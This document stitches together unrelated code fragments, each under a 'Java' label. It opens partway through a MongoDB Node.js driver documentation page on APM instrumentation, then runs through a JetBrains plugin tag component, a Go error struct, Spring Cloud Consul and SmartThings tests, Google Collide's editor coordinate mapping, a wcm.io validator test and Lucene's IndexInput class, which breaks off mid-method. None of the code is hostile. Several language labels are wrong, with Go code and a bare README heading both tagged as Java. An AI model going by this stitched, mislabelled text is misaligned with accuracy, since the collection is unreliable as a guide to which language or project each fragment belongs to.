operate as a Node.js stream.</li> <li><code>instrumentations</code> an array which contains all the methods available for instrumentation. The methods are grouped by method characteristics. All methods that support a callback as well as a promise will be grouped in a single instrumentation. This simplifies the code to perform the actual instrumentation.</li> </ul> <pre><code class="language-js">{ &quot;methods&quot;: [ &quot;open&quot;, &quot;getc&quot;, &quot;puts&quot;, &quot;write&quot;, &quot;writeFile&quot;, &quot;close&quot;, &quot;unlink&quot;, &quot;readlines&quot;, &quot;rewind&quot;, &quot;read&quot;, &quot;tell&quot;, &quot;seek&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: true } } </code></pre> <p>The <code>methods</code> array contains all the methods that have the options <code>callback=true</code> and <code>promise=true</code> for the GridStore prototype. The available options are:</p> <table> <thead> <tr> <th>Options</th> <th align="left">Description</th> </tr> </thead> <tbody> <tr> <td>callback</td> <td align="left">The method supports a callback</td> </tr> <tr> <td>promise</td> <td align="left">The method can return a promise</td> </tr> <tr> <td>static</td> <td align="left">The method is a static method (not on the prototype)</td> </tr> <tr> <td>returns</td> <td align="left">The method can return one of the types in the array</td> </tr> </tbody> </table> <p>Below is a very basic instrumentation example.</p> <pre><code class="language-js">const listener = require('../..').instrument(function(err, instrumentations) { instrumentations.forEach(function(obj) { const object = obj.obj; // Iterate over all the methods that are just callback with no return obj.instrumentations.forEach(function(instr) { const options = instr.options; if(options.callback &amp;&amp; !options.returns &amp;&amp; !options.static) { // Method name instr.methods.forEach(function(method) { function applyMethod(_method) { const func = 
object.prototype[_method]; overrides.push({ obj: object.prototype, method: _method, func: func }); object.prototype[_method] = function() { if(!methodsCalled[_method]) methodsCalled[_method] = 0; methodsCalled[_method] = methodsCalled[_method] + 1; const args = Array.prototype.slice.call(arguments, 0); func.apply(this, args); } } applyMethod(method); }); } }); }); }); </code></pre> <p>This instrumentation only overrides methods that have callbacks and ignores promises, so it&rsquo;s not a complete solution, but shows how an API user can structure code to tap into the exposed surface of the driver.</p> <div id="btnv"> <div class="pull-left"> <a class="navigation prev" href="/node-mongodb-native/3.1/reference/management/logging/"> <i class="fa fa-long-arrow-left"> </i> Logging </a> </div> <div class="pull-right"> <a class="navigation next" href="/node-mongodb-native/3.1/reference/management/sdam-monitoring/"> Topology Monitoring <i class="fa fa-long-arrow-right"> </i> </a> </div> </div> </div> <div class="right-column"> <div class="wrapper"> <div class="toc"> <span class="toc-header">On this page</span> <nav id="TableOfContents"> <ul> <li><a href="#apm">APM</a> <ul> <li><a href="#api">API</a></li> <li><a href="#command-monitoring">Command Monitoring</a> <ul> <li><a href="#operationidgenerator">operationIdGenerator</a></li> <li><a href="#timestampgenerator">timestampGenerator</a></li> </ul></li> <li><a href="#instrumentation">Instrumentation</a></li> </ul></li> </ul> </nav> </div> </div> </div> </div> </div> </div> </section> </section> </section> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: "/node-mongodb-native/3.1", VERSION: "3.1", COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/jquery.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/lib/bootstrap.js"></script> <script type="text/javascript" 
src="/node-mongodb-native/3.1/js/navbar.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/lib/highlight/highlight.pack.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/scripts.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/lib/bootstrap-toggle/bootstrap-toggle.min.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/java.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/toggle-switch.js"></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-29229787-1', 'auto'); ga('send', 'pageview'); </script> </body> </html>
Java
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.ide.plugins.newui;

import com.intellij.ide.IdeBundle;
import com.intellij.ui.JBColor;
import com.intellij.util.ui.JBUI;
import org.jetbrains.annotations.Nls;
import org.jetbrains.annotations.NotNull;

import java.awt.*;

/**
 * A small colored "tag" label (EAP, Paid, Trial, ...) rendered on plugin cards.
 * The background color and optional tooltip are chosen from the tag name in
 * {@link #setText(String)}; colors are theme-overridable via {@code Plugins.*} keys.
 *
 * @author Alexander Lobas
 */
public class TagComponent extends LinkComponent {
  private static final Color BACKGROUND = JBColor.namedColor("Plugins.tagBackground", new JBColor(0xEAEAEC, 0x4D4D4D));
  private static final Color EAP_BACKGROUND = JBColor.namedColor("Plugins.eapTagBackground", new JBColor(0xF2D2CF, 0xF2D2CF));
  private static final Color PAID_BACKGROUND = JBColor.namedColor("Plugins.paidTagBackground", new JBColor(0xD8EDF8, 0x3E505C));
  // Fix: the dark fallback was written as the 7-digit literal 0x345574E (a stray
  // trailing digit); every sibling fallback color is a 6-digit RGB value, so the
  // intended value is 0x345574.
  private static final Color TRIAL_BACKGROUND = JBColor.namedColor("Plugins.trialTagBackground", new JBColor(0xDBE8DD, 0x345574));
  private static final Color FOREGROUND = JBColor.namedColor("Plugins.tagForeground", new JBColor(0x787878, 0x999999));

  // Background chosen for the current tag text; painted in paintComponent().
  private Color myColor;

  public TagComponent() {
    setForeground(FOREGROUND);
    setPaintUnderline(false);
    setOpaque(false);
    setBorder(JBUI.Borders.empty(1, 8));
  }

  public TagComponent(@NotNull @Nls String name) {
    this();
    setText(name);
  }

  /**
   * Sets the tag text and derives the matching background color and tooltip:
   * EAP gets its own background plus an explanatory tooltip, Trial/Purchased
   * share the trial background, Paid/Freemium share the paid background plus a
   * tooltip; everything else falls back to the default background.
   */
  @Override
  public void setText(@NotNull @Nls String name) {
    String tooltip = null;
    myColor = BACKGROUND;

    if (Tags.EAP.name().equals(name)) {
      myColor = EAP_BACKGROUND;
      tooltip = IdeBundle.message("tooltip.eap.plugin.version");
    }
    else if (Tags.Trial.name().equals(name) || Tags.Purchased.name().equals(name)) {
      myColor = TRIAL_BACKGROUND;
    }
    else if (Tags.Paid.name().equals(name) || Tags.Freemium.name().equals(name)) {
      myColor = PAID_BACKGROUND;
      tooltip = IdeBundle.message("tooltip.paid.plugin");
    }

    super.setText(name);
    setToolTipText(tooltip);
  }

  @Override
  protected void paintComponent(Graphics g) {
    // When underlined (hovered), paint the same color at ~70% alpha (178/255).
    //noinspection UseJBColor
    g.setColor(myUnderline ? new Color(myColor.getRed(), myColor.getGreen(), myColor.getBlue(), 178) : myColor);
    g.fillRect(0, 0, getWidth(), getHeight());
    super.paintComponent(g);
  }

  /** The whole tag is clickable, not just the text glyphs. */
  @Override
  protected boolean isInClickableArea(Point pt) {
    return true;
  }
}
Java
package esilegacy

// GatewayTimeout is the gateway-timeout error model (presumably the body of an
// HTTP 504 response from the API — confirm against the ESI spec).
type GatewayTimeout struct {
	// Error_ is the gateway timeout message; omitted from JSON when empty.
	Error_ string `json:"error,omitempty"`
	// Timeout is the number of seconds the request was given; omitted from
	// JSON when zero.
	Timeout int32 `json:"timeout,omitempty"`
}
Java
/* * Copyright 2013-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.cloud.consul.discovery; import org.junit.jupiter.api.Test; import org.springframework.cloud.commons.util.InetUtils; import org.springframework.cloud.commons.util.InetUtilsProperties; import static org.assertj.core.api.Assertions.assertThat; /** * @author Spencer Gibb */ public class ConsulCatalogWatchTests { @Test public void isRunningReportsCorrectly() { ConsulDiscoveryProperties properties = new ConsulDiscoveryProperties(new InetUtils(new InetUtilsProperties())); ConsulCatalogWatch watch = new ConsulCatalogWatch(properties, null) { @Override public void catalogServicesWatch() { // do nothing } }; assertThat(watch.isRunning()).isFalse(); watch.start(); assertThat(watch.isRunning()).isTrue(); watch.stop(); assertThat(watch.isRunning()).isFalse(); } }
Java
// Copyright 2012 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package com.google.collide.client.editor;

import com.google.collide.client.util.logging.Log;
import com.google.collide.json.shared.JsonArray;
import com.google.collide.shared.document.Document;
import com.google.collide.shared.document.Line;
import com.google.collide.shared.document.LineInfo;
import com.google.collide.shared.document.anchor.Anchor;
import com.google.collide.shared.document.anchor.Anchor.RemovalStrategy;
import com.google.collide.shared.document.anchor.AnchorManager;
import com.google.collide.shared.document.anchor.AnchorType;
import com.google.collide.shared.util.ListenerRegistrar.Remover;
import com.google.collide.shared.util.SortedList;
import com.google.collide.shared.util.SortedList.OneWayIntComparator;

/**
 * This class takes care of mapping between the different coordinates used by
 * the editor. The two supported systems are:
 * <ul>
 * <li>Offset (x,y) - in pixels, relative to the top left of line 0 in the
 * current document.
 * <li>Line (line, column) - the real line number and column, taking into
 * account spacer objects in between lines. Lines and columns are 0-indexed.
 * </ul>
 */
class CoordinateMap implements Document.LineListener {

  /** Supplies editor metrics and receives spacer-height-change notifications. */
  interface DocumentSizeProvider {
    float getEditorCharacterWidth();

    int getEditorLineHeight();

    void handleSpacerHeightChanged(Spacer spacer, int oldHeight);
  }

  /**
   * Immutable cache entry recording the pixel offset and height of a spacer at
   * a given line number. Entries are only created for lines that have spacers.
   */
  private static class OffsetCache {
    // Orders entries by their pixel offset.
    private static final SortedList.Comparator<OffsetCache> COMPARATOR =
        new SortedList.Comparator<OffsetCache>() {
          @Override
          public int compare(OffsetCache a, OffsetCache b) {
            return a.offset - b.offset;
          }
        };

    // One-way comparator for binary search by pixel offset.
    private static final SortedList.OneWayIntComparator<OffsetCache> Y_OFFSET_ONE_WAY_COMPARATOR =
        new SortedList.OneWayIntComparator<OffsetCache>() {
          @Override
          public int compareTo(OffsetCache s) {
            return value - s.offset;
          }
        };

    // One-way comparator for binary search by line number.
    private static final SortedList.OneWayIntComparator<OffsetCache> LINE_NUMBER_ONE_WAY_COMPARATOR =
        new SortedList.OneWayIntComparator<OffsetCache>() {
          @Override
          public int compareTo(OffsetCache s) {
            return value - s.lineNumber;
          }
        };

    // Pixel y-offset of the top of this entry's spacer.
    private final int offset;
    // Pixel height of the spacer at this entry.
    private final int height;
    // 0-indexed line number this entry's spacer sits on.
    private final int lineNumber;

    private OffsetCache(int offset, int lineNumber, int height) {
      this.offset = offset;
      this.height = height;
      this.lineNumber = lineNumber;
    }
  }

  // Sentinel returned when nothing precedes the target: document top, no height.
  private static final OffsetCache BEGINNING_EMPTY_OFFSET_CACHE = new OffsetCache(0, 0, 0);

  private static final AnchorType SPACER_ANCHOR_TYPE =
      AnchorType.create(CoordinateMap.class, "spacerAnchorType");

  private static final Spacer.Comparator SPACER_COMPARATOR = new Spacer.Comparator();
  private static final Spacer.OneWaySpacerComparator SPACER_ONE_WAY_COMPARATOR =
      new Spacer.OneWaySpacerComparator();

  /** Used by {@link #getPrecedingOffsetCache(int, int)} */
  private static final int IGNORE = Integer.MIN_VALUE;

  private Document document;
  private DocumentSizeProvider documentSizeProvider;

  /** List of offset cache items, sorted by the offset */
  private SortedList<OffsetCache> offsetCache;

  /**
   * True if there is at least one spacer in the editor, false otherwise (false
   * means a simple height / line height calculation can be used)
   */
  private boolean requiresMapping;

  /** Sorted by line number */
  private SortedList<Spacer> spacers;

  /** Summation of all spacers' heights */
  private int totalSpacerHeight;

  /** Remover for listener */
  private Remover documentLineListenerRemover;

  CoordinateMap(DocumentSizeProvider documentSizeProvider) {
    this.documentSizeProvider = documentSizeProvider;
    requiresMapping = false;
  }

  /**
   * Converts a pixel y-offset into a 0-indexed line number. Negative y clamps
   * to line 0; without spacers this is a plain division by the line height.
   */
  int convertYToLineNumber(int y) {
    if (y < 0) {
      return 0;
    }

    int lineHeight = documentSizeProvider.getEditorLineHeight();
    if (!requiresMapping) {
      return y / lineHeight;
    }

    OffsetCache precedingOffsetCache = getPrecedingOffsetCache(y, IGNORE);
    int precedingOffsetCacheBottom = precedingOffsetCache.offset + precedingOffsetCache.height;
    int lineNumberRelativeToOffsetCacheLine = (y - precedingOffsetCacheBottom) / lineHeight;

    if (y < precedingOffsetCacheBottom) {
      // y is inside the spacer
      return precedingOffsetCache.lineNumber;
    } else {
      return precedingOffsetCache.lineNumber + lineNumberRelativeToOffsetCacheLine;
    }
  }

  /**
   * Returns the top of the given line.
   */
  int convertLineNumberToY(int lineNumber) {
    int lineHeight = documentSizeProvider.getEditorLineHeight();
    if (!requiresMapping) {
      return lineNumber * lineHeight;
    }

    OffsetCache precedingOffsetCache = getPrecedingOffsetCache(IGNORE, lineNumber);
    int precedingOffsetCacheBottom = precedingOffsetCache.offset + precedingOffsetCache.height;
    int offsetRelativeToOffsetCacheBottom =
        (lineNumber - precedingOffsetCache.lineNumber) * lineHeight;
    return precedingOffsetCacheBottom + offsetRelativeToOffsetCacheBottom;
  }

  /**
   * Returns the first {@link OffsetCache} that is positioned less than or equal
   * to {@code y} or {@code lineNumber}. This methods fills the
   * {@link #offsetCache} if necessary ensuring the returned {@link OffsetCache}
   * is up-to-date.
   *
   * @param y the y, or {@link #IGNORE} if looking up by {@code lineNumber}
   * @param lineNumber the line number, or {@link #IGNORE} if looking up by
   *        {@code y}
   */
  private OffsetCache getPrecedingOffsetCache(int y, int lineNumber) {
    // Exactly one of the two lookup keys must be provided.
    assert (y != IGNORE && lineNumber == IGNORE) || (lineNumber != IGNORE && y == IGNORE);

    final int lineHeight = documentSizeProvider.getEditorLineHeight();

    OffsetCache previousOffsetCache;
    if (y != IGNORE) {
      previousOffsetCache =
          getCachedPrecedingOffsetCacheImpl(OffsetCache.Y_OFFSET_ONE_WAY_COMPARATOR, y);
    } else {
      previousOffsetCache =
          getCachedPrecedingOffsetCacheImpl(OffsetCache.LINE_NUMBER_ONE_WAY_COMPARATOR, lineNumber);
    }

    if (previousOffsetCache == null) {
      // Nothing cached before the target: seed from a spacer on line 0 if one
      // exists, otherwise fall back to the document-top sentinel.
      if (spacers.size() > 0 && spacers.get(0).getLineNumber() == 0) {
        previousOffsetCache = createOffsetCache(0, 0, spacers.get(0).getHeight());
      } else {
        previousOffsetCache = BEGINNING_EMPTY_OFFSET_CACHE;
      }
    }

    /*
     * Optimization so the common case that the target has previously been
     * computed requires no more computation
     */
    int offsetCacheSize = offsetCache.size();
    if (offsetCacheSize > 0
        && isTargetEarlierThanOffsetCache(y, lineNumber, offsetCache.get(offsetCacheSize - 1))) {
      return previousOffsetCache;
    }

    // This will return this offset cache's matching spacer
    int spacerPos = getPrecedingSpacerIndex(previousOffsetCache.lineNumber);
    /*
     * We want the spacer following this offset cache's spacer, or the first
     * spacer if none were found
     */
    spacerPos++;

    // Walk forward through spacers, materializing cache entries until the next
    // entry would pass the target.
    for (int n = spacers.size(); spacerPos < n; spacerPos++) {
      Spacer curSpacer = spacers.get(spacerPos);
      int previousOffsetCacheBottom = previousOffsetCache.offset + previousOffsetCache.height;
      int simpleLinesHeight =
          (curSpacer.getLineNumber() - previousOffsetCache.lineNumber) * lineHeight;
      if (simpleLinesHeight == 0) {
        Log.warn(Spacer.class, "More than one spacer on line " + previousOffsetCache.lineNumber);
      }

      // Create an offset cache for this spacer
      OffsetCache curOffsetCache = createOffsetCache(
          previousOffsetCacheBottom + simpleLinesHeight, curSpacer.getLineNumber(),
          curSpacer.getHeight());
      if (isTargetEarlierThanOffsetCache(y, lineNumber, curOffsetCache)) {
        return previousOffsetCache;
      }

      previousOffsetCache = curOffsetCache;
    }

    return previousOffsetCache;
  }

  /**
   * Returns the {@link OffsetCache} instance in list that has the greatest
   * value less than or equal to the given {@code value}. Returns null if there
   * isn't one.
   *
   * This should only be used by {@link #getPrecedingOffsetCache(int, int)}.
   */
  private OffsetCache getCachedPrecedingOffsetCacheImpl(
      OneWayIntComparator<OffsetCache> comparator, int value) {
    comparator.setValue(value);
    int index = offsetCache.findInsertionIndex(comparator, false);
    return index >= 0 ? offsetCache.get(index) : null;
  }

  // True when the target (y or lineNumber, whichever is active) lies strictly
  // before the given cache entry.
  private boolean isTargetEarlierThanOffsetCache(int y, int lineNumber, OffsetCache offsetCache) {
    return ((y != IGNORE && y < offsetCache.offset)
        || (lineNumber != IGNORE && lineNumber < offsetCache.lineNumber));
  }

  // Creates an entry and registers it in the sorted cache.
  private OffsetCache createOffsetCache(int offset, int lineNumber, int height) {
    OffsetCache createdOffsetCache = new OffsetCache(offset, lineNumber, height);
    offsetCache.add(createdOffsetCache);
    return createdOffsetCache;
  }

  // Index of the last spacer at or before the given line, or the insertion
  // point semantics of SortedList#findInsertionIndex when none exists.
  private int getPrecedingSpacerIndex(int lineNumber) {
    SPACER_ONE_WAY_COMPARATOR.setValue(lineNumber);
    return spacers.findInsertionIndex(SPACER_ONE_WAY_COMPARATOR, false);
  }

  /**
   * Adds a spacer above the given lineInfo line with height heightPx and
   * returns the created Spacer object.
   *
   * @param lineInfo the line before which the spacer will be inserted
   * @param height the height in pixels of the spacer
   */
  Spacer createSpacer(LineInfo lineInfo, int height, Buffer buffer, String cssClass) {
    int lineNumber = lineInfo.number();

    // create an anchor on the current line
    Anchor anchor = document.getAnchorManager().createAnchor(SPACER_ANCHOR_TYPE, lineInfo.line(),
        lineNumber, AnchorManager.IGNORE_COLUMN);
    anchor.setRemovalStrategy(RemovalStrategy.SHIFT);

    // account for the height of the line the spacer is on
    Spacer spacer = new Spacer(anchor, height, this, buffer, cssClass);
    spacers.add(spacer);
    totalSpacerHeight += height;
    invalidateLineNumberAndFollowing(lineNumber);
    requiresMapping = true;
    return spacer;
  }

  /**
   * Removes the given spacer, detaching its anchor and invalidating cached
   * offsets from the line before it onward. Returns false if it was not
   * present.
   */
  boolean removeSpacer(Spacer spacer) {
    int lineNumber = spacer.getLineNumber();
    if (spacers.remove(spacer)) {
      document.getAnchorManager().removeAnchor(spacer.getAnchor());
      totalSpacerHeight -= spacer.getHeight();
      // NOTE(review): invalidates from lineNumber - 1, one line earlier than
      // createSpacer does — presumably deliberate; confirm before changing.
      invalidateLineNumberAndFollowing(lineNumber - 1);
      updateRequiresMapping();
      return true;
    }

    return false;
  }

  /**
   * Rebinds this map to a new document: detaches the previous line listener,
   * resets all spacer/cache state, and subscribes to the new document's line
   * changes.
   */
  void handleDocumentChange(Document document) {
    if (documentLineListenerRemover != null) {
      documentLineListenerRemover.remove();
    }

    this.document = document;
    spacers = new SortedList<Spacer>(SPACER_COMPARATOR);
    offsetCache = new SortedList<OffsetCache>(OffsetCache.COMPARATOR);
    documentLineListenerRemover = document.getLineListenerRegistrar().add(this);
    requiresMapping = false; // starts with no items in list
    totalSpacerHeight = 0;
  }

  @Override
  public void onLineAdded(Document document, int lineNumber, JsonArray<Line> addedLines) {
    invalidateLineNumberAndFollowing(lineNumber);
  }

  @Override
  public void onLineRemoved(Document document, int lineNumber, JsonArray<Line> removedLines) {
    invalidateLineNumberAndFollowing(lineNumber);
  }

  /**
   * Call this after any line changes (adding/deleting lines, changing line
   * heights). Only invalidate (delete) cache items >= lineNumber, don't
   * recalculate.
   */
  void invalidateLineNumberAndFollowing(int lineNumber) {
    OffsetCache.LINE_NUMBER_ONE_WAY_COMPARATOR.setValue(lineNumber);
    int insertionIndex =
        offsetCache.findInsertionIndex(OffsetCache.LINE_NUMBER_ONE_WAY_COMPARATOR);
    offsetCache.removeThisAndFollowing(insertionIndex);
  }

  private void updateRequiresMapping() {
    // check to change active status
    requiresMapping = spacers.size() > 0;
  }

  int getTotalSpacerHeight() {
    return totalSpacerHeight;
  }

  /**
   * Adjusts the running total for a spacer whose height changed, invalidates
   * cached offsets from its line onward, and forwards the notification to the
   * {@link DocumentSizeProvider}.
   */
  void handleSpacerHeightChanged(Spacer spacer, int oldHeight) {
    totalSpacerHeight -= oldHeight;
    totalSpacerHeight += spacer.getHeight();
    invalidateLineNumberAndFollowing(spacer.getLineNumber());
    documentSizeProvider.handleSpacerHeightChanged(spacer, oldHeight);
  }
}
Java
package com.unitvectory.shak.jarvis.model; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; import static org.junit.Assert.assertTrue; import org.junit.Test; import com.unitvectory.shak.jarvis.util.ResourceHelper; /** * Tests the SmartThingsPublish class * * @author Jared Hatfield * */ public class SmartThingsPublishTest { /** * Test the parser being given a null value */ @Test public void testNullStringParse() { JsonPublishRequest myRequest = null; SmartThingsPublish smart = new SmartThingsPublish(myRequest); assertNotNull(smart); assertNull(smart.getPublish()); assertNull(smart.getAuth()); assertNull(smart.getDate()); assertNull(smart.getDescription()); assertNull(smart.getDescriptionText()); assertNull(smart.getDeviceId()); assertNull(smart.getHubId()); assertNull(smart.getId()); assertNull(smart.getLocationId()); assertNull(smart.getName()); assertNull(smart.getSource()); assertNull(smart.getUnit()); assertNull(smart.getValue()); } /** * Test the parser when things go perfectly. 
*/ @Test public void testValidParse() { // Load the test JSON String json = ResourceHelper.load("/messagebody.json"); assertNotNull(json); assertTrue(json.length() > 0); // Create the object JsonPublishRequest request = new JsonPublishRequest(json); assertNotNull(request); assertTrue(request.isValid()); assertNotNull(request.getData()); // Create the SmartThingsPublish SmartThingsPublish smart = new SmartThingsPublish(request); assertNotNull(smart); assertEquals("foobar", smart.getAuth()); assertEquals("2013-12-30T16:03:08.224Z", smart.getDate()); assertEquals( "raw:08EF170A59FF, dni:08EF, battery:17, batteryDivisor:0A, rssi:59, lqi:FF", smart.getDescription()); assertEquals("Sensor was -39 dBm", smart.getDescriptionText()); assertEquals("2fffffff-fffff-ffff-ffff-fffffffffff", smart.getDeviceId()); assertEquals("3fffffff-fffff-ffff-ffff-fffffffffff", smart.getHubId()); assertEquals("1fffffff-fffff-ffff-ffff-fffffffffff", smart.getId()); assertEquals("4fffffff-fffff-ffff-ffff-fffffffffff", smart.getLocationId()); assertEquals("rssi", smart.getName()); assertEquals("DEVICE", smart.getSource()); assertEquals("dBm", smart.getUnit()); assertEquals("-39", smart.getValue()); } }
Java
/*
 * #%L
 * wcm.io
 * %%
 * Copyright (C) 2015 wcm.io
 * %%
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 * #L%
 */
package io.wcm.devops.conga.plugins.sling.validator;

import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;

import java.io.File;
import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;

import io.wcm.devops.conga.generator.spi.ValidationException;
import io.wcm.devops.conga.generator.spi.ValidatorPlugin;
import io.wcm.devops.conga.generator.spi.context.FileContext;
import io.wcm.devops.conga.generator.util.PluginManagerImpl;

/**
 * Tests acceptance and validation behavior of {@link ProvisioningValidator}.
 */
public class ProvisioningValidatorTest {

  private ValidatorPlugin validator;

  @BeforeEach
  public void setUp() {
    validator = new PluginManagerImpl().get(ProvisioningValidator.NAME, ValidatorPlugin.class);
  }

  /** Builds a UTF-8 {@link FileContext} for a classpath test resource. */
  private FileContext contextFor(String resourceName) throws Exception {
    File file = new File(getClass().getResource(resourceName).toURI());
    return new FileContext().file(file).charset(StandardCharsets.UTF_8);
  }

  @Test
  public void testValid() throws Exception {
    FileContext fileContext = contextFor("/validProvisioning.txt");
    assertTrue(validator.accepts(fileContext, null));
    // Must not throw for a valid provisioning file.
    validator.apply(fileContext, null);
  }

  @Test
  public void testInvalid() throws Exception {
    FileContext fileContext = contextFor("/invalidProvisioning.txt");
    assertTrue(validator.accepts(fileContext, null));
    // The validator accepts the extension but must reject the content.
    assertThrows(ValidationException.class, () -> validator.apply(fileContext, null));
  }

  @Test
  public void testInvalidFileExtension() throws Exception {
    // Files without the provisioning extension are not accepted at all.
    assertFalse(validator.accepts(contextFor("/noProvisioning.txt"), null));
  }

}
Java
project-meet ============
Java
package org.targettest.org.apache.lucene.store;

/**
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

import java.io.IOException;
import java.io.Closeable;
import java.util.Map;
import java.util.HashMap;

/** Abstract base class for input from a file in a {@link Directory}.  A
 * random-access input stream.  Used for all Lucene index input operations.
 * All multi-byte values are read big-endian; variable-length integers use
 * 7 bits per byte with the high bit as a continuation flag.
 * @see Directory
 */
public abstract class IndexInput implements Cloneable, Closeable {

  // true if we are reading the old pre-2.4 (modified UTF8) string format;
  // toggled by setModifiedUTF8StringsMode() and consulted by readString().
  private boolean preUTF8Strings;

  /** Reads and returns a single byte.
   * @see IndexOutput#writeByte(byte)
   */
  public abstract byte readByte() throws IOException;

  /** Reads a specified number of bytes into an array at the specified offset.
   * @param b the array to read bytes into
   * @param offset the offset in the array to start storing bytes
   * @param len the number of bytes to read
   * @see IndexOutput#writeBytes(byte[],int)
   */
  public abstract void readBytes(byte[] b, int offset, int len) throws IOException;

  /** Reads a specified number of bytes into an array at the
   * specified offset with control over whether the read
   * should be buffered (callers who have their own buffer
   * should pass in "false" for useBuffer).  Currently only
   * {@link BufferedIndexInput} respects this parameter.
   * @param b the array to read bytes into
   * @param offset the offset in the array to start storing bytes
   * @param len the number of bytes to read
   * @param useBuffer set to false if the caller will handle
   * buffering.
   * @see IndexOutput#writeBytes(byte[],int)
   */
  public void readBytes(byte[] b, int offset, int len, boolean useBuffer) throws IOException {
    // Default to ignoring useBuffer entirely; subclasses may override.
    readBytes(b, offset, len);
  }

  /** Reads four bytes (big-endian) and returns an int.
   * @see IndexOutput#writeInt(int)
   */
  public int readInt() throws IOException {
    return ((readByte() & 0xFF) << 24) | ((readByte() & 0xFF) << 16) | ((readByte() & 0xFF) << 8) | (readByte() & 0xFF);
  }

  /** Reads an int stored in variable-length format.  Reads between one and
   * five bytes.  Smaller values take fewer bytes.  Negative numbers are not
   * supported.
   * @see IndexOutput#writeVInt(int)
   */
  public int readVInt() throws IOException {
    byte b = readByte();
    int i = b & 0x7F;
    // High bit set means another 7-bit group follows.
    for (int shift = 7; (b & 0x80) != 0; shift += 7) {
      b = readByte();
      i |= (b & 0x7F) << shift;
    }
    return i;
  }

  /** Reads eight bytes (big-endian) and returns a long.
   * @see IndexOutput#writeLong(long)
   */
  public long readLong() throws IOException {
    // Mask the low int to avoid sign extension when widening to long.
    return (((long) readInt()) << 32) | (readInt() & 0xFFFFFFFFL);
  }

  /** Reads a long stored in variable-length format.  Reads between one and
   * nine bytes.  Smaller values take fewer bytes.  Negative numbers are not
   * supported.
   */
  public long readVLong() throws IOException {
    byte b = readByte();
    long i = b & 0x7F;
    for (int shift = 7; (b & 0x80) != 0; shift += 7) {
      b = readByte();
      i |= (b & 0x7FL) << shift;
    }
    return i;
  }

  /** Call this if readString should read characters stored
   * in the old modified UTF8 format (length in java chars
   * and java's modified UTF8 encoding).  This is used for
   * indices written pre-2.4.  See LUCENE-510 for details.
   */
  public void setModifiedUTF8StringsMode() {
    preUTF8Strings = true;
  }

  /** Reads a string: a VInt byte-length followed by UTF-8 bytes
   * (or the legacy modified-UTF8 form when
   * {@link #setModifiedUTF8StringsMode()} has been called).
   * @see IndexOutput#writeString(String)
   */
  public String readString() throws IOException {
    if (preUTF8Strings)
      return readModifiedUTF8String();
    int length = readVInt();
    final byte[] bytes = new byte[length];
    readBytes(bytes, 0, length);
    return new String(bytes, 0, length, "UTF-8");
  }

  // Legacy path: length is a char count and bytes are Java modified UTF-8.
  private String readModifiedUTF8String() throws IOException {
    int length = readVInt();
    final char[] chars = new char[length];
    readChars(chars, 0, length);
    return new String(chars, 0, length);
  }

  /** Reads Lucene's old "modified UTF-8" encoded
   * characters into an array.
   * @param buffer the array to read characters into
   * @param start the offset in the array to start storing characters
   * @param length the number of characters to read
   * @see IndexOutput#writeChars(String,int,int)
   * @deprecated -- please use readString or readBytes
   *                instead, and construct the string
   *                from those utf8 bytes
   */
  public void readChars(char[] buffer, int start, int length) throws IOException {
    final int end = start + length;
    for (int i = start; i < end; i++) {
      byte b = readByte();
      if ((b & 0x80) == 0)
        // 1-byte sequence: 0xxxxxxx
        buffer[i] = (char) (b & 0x7F);
      else if ((b & 0xE0) != 0xE0) {
